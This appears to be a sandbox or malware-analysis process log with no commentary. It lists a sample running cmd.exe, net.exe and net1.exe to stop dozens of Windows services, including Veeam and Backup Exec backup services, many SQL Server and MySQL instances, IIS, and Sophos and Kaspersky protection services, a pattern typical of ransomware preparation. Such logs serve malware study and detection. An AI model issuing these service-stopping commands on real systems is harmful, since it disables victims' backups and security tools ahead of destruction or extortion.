C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "Zoolz 2 Service" /y4⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop AcrSch2Svc /y4⤵
-
C:\Windows\system32\net.exenet stop AcrSch2Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ARSM /y4⤵
-
C:\Windows\system32\net.exenet stop ARSM /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecAgentAccelerator /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecAgentAccelerator /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecAgentBrowser /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecAgentBrowser /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecDeviceMediaService /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecDeviceMediaService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecJobEngine /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecJobEngine /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecManagementService /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecManagementService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecRPCService /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecRPCService /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop BackupExecVSSProvider /y4⤵
-
C:\Windows\system32\net.exenet stop BackupExecVSSProvider /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop bedbg /y4⤵
-
C:\Windows\system32\net.exenet stop bedbg /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MMS /y4⤵
-
C:\Windows\system32\net.exenet stop MMS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop mozyprobackup /y4⤵
-
C:\Windows\system32\net.exenet stop mozyprobackup /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ntrtscan /y4⤵
-
C:\Windows\system32\net.exenet stop ntrtscan /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop PDVFSService /y4⤵
-
C:\Windows\system32\net.exenet stop PDVFSService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SDRSVC /y4⤵
-
C:\Windows\system32\net.exenet stop SDRSVC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SNAC /y4⤵
-
C:\Windows\system32\net.exenet stop SNAC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLWriter /y4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamBackupSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamBackupSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamBrokerSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamBrokerSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamCatalogSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamCatalogSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamCloudSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamCloudSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamDeploymentService /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamDeploymentService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamDeploySvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamDeploySvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y6⤵
-
C:\Windows\system32\net.exenet stop MsDtsServer110 /y7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y8⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamEnterpriseManagerSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamEnterpriseManagerSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamHvIntegrationSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamHvIntegrationSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamMountSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamMountSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamNFSSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamNFSSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamRESTSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamRESTSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop VeeamTransportSvc /y4⤵
-
C:\Windows\system32\net.exenet stop VeeamTransportSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop wbengine /y4⤵
-
C:\Windows\system32\net.exenet stop wbengine /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop wbengine /y4⤵
-
C:\Windows\system32\net.exenet stop wbengine /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop sms_site_sql_backup /y4⤵
-
C:\Windows\system32\net.exenet stop sms_site_sql_backup /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MsDtsServer /y4⤵
-
C:\Windows\system32\net.exenet stop MsDtsServer /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MsDtsServer100 /y4⤵
-
C:\Windows\system32\net.exenet stop MsDtsServer100 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MsDtsServer110 /y4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop msftesql$PROD /y4⤵
-
C:\Windows\system32\net.exenet stop msftesql$PROD /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSOLAP$SQL_2008 /y4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSOLAP$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net.exenet stop MSOLAP$SYSTEM_BGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSOLAP$TPS /y4⤵
-
C:\Windows\system32\net.exenet stop MSOLAP$TPS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSOLAP$TPSAMA /y4⤵
-
C:\Windows\system32\net.exenet stop MSOLAP$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$BKUPEXEC /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$BKUPEXEC /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$ECWDB2 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ECWDB2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$PRACTICEMGT /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$PRACTICEMGT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$PRACTTICEBGC /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$PRACTTICEBGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$PROD /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$PROD /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$PROFXENGAGEMENT /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SBSMONITORING /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SBSMONITORING /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y6⤵
-
C:\Windows\system32\net.exenet stop ReportServer$SQL_2008 /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y7⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SHAREPOINT /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SHAREPOINT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SQL_2008 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SQLEXPRESS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$SYSTEM_BGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$TPS /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$TPS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$TPSAMA /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$VEEAMSQL2012 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$SBSMONITORING /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$SHAREPOINT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$SQL_2008 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$SYSTEM_BGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPS /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$TPS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLFDLauncher$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLSERVER /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLSERVER /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLServerADHelper /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLServerADHelper100 /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper100 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MSSQLServerOLAPService /y4⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerOLAPService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MySQL57 /y4⤵
-
C:\Windows\system32\net.exenet stop MySQL57 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop MySQL80 /y4⤵
-
C:\Windows\system32\net.exenet stop MySQL80 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop OracleClientCache80 /y4⤵
-
C:\Windows\system32\net.exenet stop OracleClientCache80 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop ReportServer$SQL_2008 /y4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop RESvc /y4⤵
-
C:\Windows\system32\net.exenet stop RESvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$BKUPEXEC /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$BKUPEXEC /y5⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$CITRIX_METAFRAME /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$CXDB /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$CXDB /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$ECWDB2 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ECWDB2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$PRACTTICEBGC /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$PRACTTICEBGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$PRACTTICEMGT /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$PRACTTICEMGT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$PROD /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$PROD /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$PROFXENGAGEMENT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SBSMONITORING /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SBSMONITORING /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SHAREPOINT /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SHAREPOINT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SQL_2008 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SQL_2008 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SQLEXPRESS /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SQLEXPRESS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$SYSTEM_BGC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$TPS /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$TPS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$TPSAMA /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$VEEAMSQL2012 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLBrowser /y4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLSafeOLRService /y4⤵
-
C:\Windows\system32\net.exenet stop SQLSafeOLRService /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLSERVERAGENT /y4⤵
-
C:\Windows\system32\net.exenet stop SQLSERVERAGENT /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLTELEMETRY /y4⤵
-
C:\Windows\system32\net.exenet stop SQLTELEMETRY /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y4⤵
-
C:\Windows\system32\net.exenet stop SQLTELEMETRY$ECWDB2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop mssql$vim_sqlexp /y4⤵
-
C:\Windows\system32\net.exenet stop mssql$vim_sqlexp /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop IISAdmin /y4⤵
-
C:\Windows\system32\net.exenet stop IISAdmin /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop NetMsmqActivator /y4⤵
-
C:\Windows\system32\net.exenet stop NetMsmqActivator /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop POP3Svc /y4⤵
-
C:\Windows\system32\net.exenet stop POP3Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y5⤵
-
C:\Windows\system32\net.exenet stop KAVFS /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y7⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop SstpSvc /y4⤵
-
C:\Windows\system32\net.exenet stop SstpSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop UI0Detect /y4⤵
-
C:\Windows\system32\net.exenet stop UI0Detect /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop W3Svc /y4⤵
-
C:\Windows\system32\net.exenet stop W3Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "aphidmonitorservice" /y4⤵
-
C:\Windows\system32\net.exenet stop "aphidmonitorservice" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "aphidmonitorservice" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop "intel(r) proset monitoring service" /y4⤵
-
C:\Windows\system32\net.exenet stop "intel(r) proset monitoring service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "intel(r) proset monitoring service" /y6⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c net stop unistoresvc_1af40a /y4⤵
-
C:\Windows\system32\net.exenet stop unistoresvc_1af40a /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y6⤵
-
